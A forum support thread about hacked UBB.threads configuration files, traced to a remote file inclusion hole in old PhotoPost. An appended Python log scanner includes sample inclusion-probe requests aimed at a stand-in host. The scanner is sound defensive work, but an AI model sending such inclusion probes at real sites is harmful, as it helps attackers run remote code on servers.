Joined: Jun 2006
Posts: 626
Addict
My config.inc.php file was hacked. Will an upgrade from 6.5.2 to 6.5.5 resolve this problem by reconfiguring this file for me?

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Upgrading to 6.5.5 will close the security issues associated with the older versions; however, your config file will probably need to be redone.

The easiest way to rebuild a good config is to go through the install process up to the point where it says the next step is to create the tables. You just stop at that point, since the tables already exist, and you should be good.

You probably will want to check and see if they've done any more than that however. It's possible they've put in some backdoors as well.

Joined: Jun 2006
Posts: 626
Addict
Thank you.

I will do the upgrade and do as you said re config file.

Joined: Jun 2006
Posts: 626
Addict
As far as the backdoors go, it seems they have been hacking a lot of forums lately, and from the information I received from a forum administrator of one of those forums, the only thing hacked was the global config file; therefore, I am not anticipating any other problems, and I do stress not anticipating.

Joined: Jun 2006
Posts: 626
Addict
The upgrade worked, as I am up and running once again; however, even after the upgrade from 6.5.2 to 6.5.5 the Group Management link still doesn't work; therefore, there must be a database problem with that one somewhere. Anyway, I am hoping version 7 will solve that problem.

Joined: Jun 2006
Posts: 626
Addict
What would happen if I changed the config.inc.php file permissions to 444?

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
You wouldn't be able to modify any config settings from the control panel. The forum would continue to operate fine, but anytime you want to make a change in the control panel you'd need to change the permissions on the config file.

Joined: Jun 2006
Posts: 742
enthusiast
I had 4 clients that had their config file hacked yesterday (different servers and hosts) and all had the previously posted security fixes applied.

This file is kind of vulnerable as it needs to be writable so that you can update the settings, but it's odd that someone was hacking threads sites yesterday. Gave me flashbacks from a few months ago.


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Joined: Jun 2006
Posts: 742
enthusiast
Also, just FYI for people following along. The default location for the config.inc.php file in Threads is inside the /includes directory, but it is possible to locate this file above web root which is more secure. You do this by adding a path to your config file in the /includes/main.inc.php file.

For example, by default (if you are on a Cpanel server) your config file might be at:

/home/youruser/public_html/ubbthreads/includes/config.inc.php

You could move it here:
/home/youruser/config.inc.php (above the public_html directory) then insert that path into the main.inc.php for the $configdir variable.


Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
Is there any suspicious activity in your clients' weblogs, Josh?


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
We still get regular attempts at hacking here (I log every attempt at any non-standard URL accessed on this domain). So more than likely their entry point would be in the log file. I just worked on one yesterday that was believed to be a .threads exploit, since the config file was hacked, but it turned out to be a hole in another script entirely that they used to overwrite the threads config file.

Joined: Jun 2006
Posts: 742
enthusiast
No suspicious activity that I could find via the URL (i.e. I was looking for URLs which had the config file in the URL for manipulation etc.)

I'm actually up to 7 hacked threads boards since the weekend. Usually just the config file is messed with, so it's pretty simple to fix. But annoying. :P


Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
For giggles, try just searching the weblogs for "http". When I was working for the webhost I had to regularly bugcheck hacked sites :sigh: it can get pretty simple to hunt down if you know what strings to fiddle with lol


Joined: Jun 2006
Posts: 742
enthusiast
I'll do that. Had 4 more hacked sites today. Either threads or photopost might be at fault here. That seems to be the common denominator with the sites/servers I'm finding. Either they replace the config files, or in a few cases users had writable index files, and those were replaced. Pretty easy to fix, but still annoying.


Joined: Jun 2006
Posts: 742
enthusiast
I discovered the source, and it was older versions of photopost that were installed on a variety of boxes, a remote file inclusion exploit with the zipndownload.php script. If you're running photopost 4.6 or earlier, delete that file. :P


Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
At least it was what I figured (being a remote file inclusion), I'm glad you got it worked out :)


Joined: Apr 2006
Posts: 44
T
newbie
"I discovered the source, and it was older versions of photopost that were installed on a variety of boxes, a remote file inclusion exploit with the zipndownload.php script. If you're running photopost 4.6 or earlier, delete that file. :P"

What is photopost? Nothing to do with UBB, but something that resides on the server, I presume? We were just hacked and I'd like to let your web host know about this.

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Photopost is an image gallery script. 6.5.5 has everything known patched up, but you should be able to find out for sure by going through your server access logs and looking for anything suspicious around the time of the hack.

Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
I'd recommend searching for "http" in your error or access logs, it'd show remote script exploits :/


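The log search suggested in the replies above (looking for "http" in the access logs), written out as an added example that is not part of the original thread or of any poster's tooling. It flags only requests whose query parameters carry a remote URL, including percent-encoded and double-encoded forms, so ordinary referer headers do not match; the combined log format, the sample lines, paths and parameter names are all constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" format: ip, ident, user, [time], "request", status, ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A query value that is itself a remote URL is what an inclusion probe looks like.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def decode_fully(value, rounds=3):
    """Strip up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_url_params(lines):
    """Return (ip, time, script, parameter, status) per suspicious parameter."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        target = urlsplit(m["target"])
        # parse_qsl removes one encoding layer; decode_fully handles the rest.
        for name, raw in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_RE.match(decode_fully(raw)):
                hits.append((m["ip"], m["ts"], target.path, name,
                             int(m["status"])))
    return hits

# Constructed sample lines (documentation IP ranges, made-up paths and parameters).
SAMPLE_LOG = [
    '198.51.100.10 - - [12/Mar/2007:10:01:22 +0000] "GET /forum/view.php?id=42 HTTP/1.1" 200 8000 "http://www.example.org/links.html" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2007:10:02:05 +0000] "GET /gallery/script.php?inc=http://host.example/x.txt? HTTP/1.1" 200 312 "-" "libwww-perl/5.805"',
    '203.0.113.7 - - [12/Mar/2007:10:02:09 +0000] "GET /gallery/script.php?inc=http%3A%2F%2Fhost.example%2Fx.txt HTTP/1.1" 404 210 "-" "libwww-perl/5.805"',
    '203.0.113.8 - - [12/Mar/2007:10:03:40 +0000] "GET /index.php?page=hTTp%253A%252F%252Fhost.example%252Fx.txt HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_remote_url_params(SAMPLE_LOG):
        print(hit)
```

Hits answered with status 200 are the ones to review first, since the script accepted the request; a legitimate redirect parameter will also match, so treat the output as leads to check against the time the config file changed.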
